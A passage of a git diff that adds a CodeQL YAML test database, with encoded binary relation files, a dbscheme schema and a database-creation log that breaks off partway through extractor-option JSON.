zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/pools/poolInfo b/ql/lib/test-db/db-yaml/default/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..6a51696b7cb94b49cb29a40c8f1618c418c97763 GIT binary patch literal 32 YcmZQz00Sl<$q2;mP#P?#`{RfV019gYQ2+n{ literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel new file mode 100644 index 0000000000000000000000000000000000000000..720d64f4baafc33efdf971f02084aca5f25b34a5 GIT binary patch literal 4 LcmZQzU|<9Q00jU7 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..c7704aa3482aaf78913dfb092fa6012f2e14e373 GIT binary patch literal 12 RcmZQzU|?hbf-vXzT>u200u%rM literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..c44d5f88d6c4629a84a90da758cdadf0ed87e804 GIT binary patch literal 8192 zcmeIufeipK2m&y5|Np!%OfcmEpjASE009C72oNAZU|(SND^EAR)9-T6b?$V_2@oJa UfB*pk1PBlyK!5-N0t5mDKAHFc2LJ#7 literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..42938ceef8f891f706d4353febf3984dc4886b15 GIT binary patch literal 8192 zcmeIuArXL36hzV201J``bRfqsfWpv)!6L|qK(n+!oSnI|{!~@<>70-I`ysXU+Nb=O to^9!JMt}eT0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PJ_C;00da2L}KE literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..e312329da67e9cd0ca5fea26c379f7b94f230b77 GIT binary patch literal 1048592 zcmeIuu?>JA07Owoq0|C)vY;?QNB|SZcLANickRzLFW<)u{i-9j8d6FjmVM?ibDg=r zhL1y7YwPD;w#5h#AV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF 
z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs 
z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly KK!5;&p9?&Xo*VA~ literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml.rel b/ql/lib/test-db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..5f848073652e137ce970cd362a76f858865fd7c4 GIT binary patch literal 1416 zcmYk6>q{455QW$Bn`LHcR(98vQVOlq?%IVA2}L5JPhv=fh-gIgw|9G<-90b|4)c4@ z46|ou-~BaBGt@NA01Phh<1IYZ3(0%-_i*%opg*4`jzlM(==C$iQE2}m%KsAW{|26e zB6<7TV+>k9+V{8qF&u{?dF#)@2}Lkg{MhqSt9JGA<1;6r{jHB5dt8AcdHbJ-*A&5I z>93cYt=jcJ$#3f~!YSzU?Ei3ggrM`dor*P$VCpuRFO}Ek50)cU@RteZFf| z^y2d_+InQ2+M-P1L`;+=3!`>)p?`BG@eceTN@fwX2W+ z`)D7d7yk=rpQ01v-<^MsUi?2q+v#<`sq}xs?_H>Wzth||-|ZJDlGnfA>7F9kE&lEK zwN<yX~>pJ_p=! z&>@E%anv!#jX2??Q%*bMtaENV?}Cdix$KIouDR}pn{K)9frtKhZy$^o-=$B7E`{Ju_zWd?lKP`VC3IG5A literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea GIT binary patch literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..573ab48b75431cf7a24d52077aa8a0371ccb9604 GIT binary patch literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..7aae4dc38a0fef1277b98a50776a547dd54eafc3 GIT binary patch literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme new file mode 100755 index 00000000000..20d83c71ee6 --- /dev/null +++ b/ql/lib/test-db/db-yaml/yaml.dbscheme 
@@ -0,0 +1,80 @@
+/*- YAML -*/
+
+#keyset[parent, idx]
+yaml (unique int id: @yaml_node,
+ int kind: int ref,
+ int parent: @yaml_node_parent ref,
+ int idx: int ref,
+ string tag: string ref,
+ string tostring: string ref);
+
+case @yaml_node.kind of
+ 0 = @yaml_scalar_node
+| 1 = @yaml_mapping_node
+| 2 = @yaml_sequence_node
+| 3 = @yaml_alias_node
+;
+
+@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
+
+@yaml_node_parent = @yaml_collection_node | @file;
+
+yaml_anchors (unique int node: @yaml_node ref,
+ string anchor: string ref);
+
+yaml_aliases (unique int alias: @yaml_alias_node ref,
+ string target: string ref);
+
+yaml_scalars (unique int scalar: @yaml_scalar_node ref,
+ int style: int ref,
+ string value: string ref);
+
+yaml_errors (unique int id: @yaml_error,
+ string message: string ref);
+
+yaml_locations(unique int locatable: @yaml_locatable ref,
+ int location: @location_default ref);
+
+@yaml_locatable = @yaml_node | @yaml_error;
+
+/*- Files and folders -*/
+
+/**
+ * The location of an element.
+ * The location spans column `startcolumn` of line `startline` to
+ * column `endcolumn` of line `endline` in file `file`.
+ * For more information, see
+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
+ */
+locations_default(
+ unique int id: @location_default,
+ int file: @file ref,
+ int beginLine: int ref,
+ int beginColumn: int ref,
+ int endLine: int ref,
+ int endColumn: int ref
+);
+
+files(
+ unique int id: @file,
+ string name: string ref
+);
+
+folders(
+ unique int id: @folder,
+ string name: string ref
+);
+
+@container = @file | @folder
+
+containerparent(
+ int parent: @container ref,
+ unique int child: @container ref
+);
+
+/*- Source location prefix -*/
+
+/**
+ * The source location of the snapshot.
+ */
+sourceLocationPrefix(string prefix : string ref);
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log
new file mode 100644
index 00000000000..8c7f3e173b7
--- /dev/null
+++ b/ql/lib/test-db/log/database-create-20240203.101754.571.log
@@ -0,0 +1,275 @@ +[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test +[2024-02-03 10:17:54] Log file was started late. +[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. 
+[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. 
+[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). 
The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files 
written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : 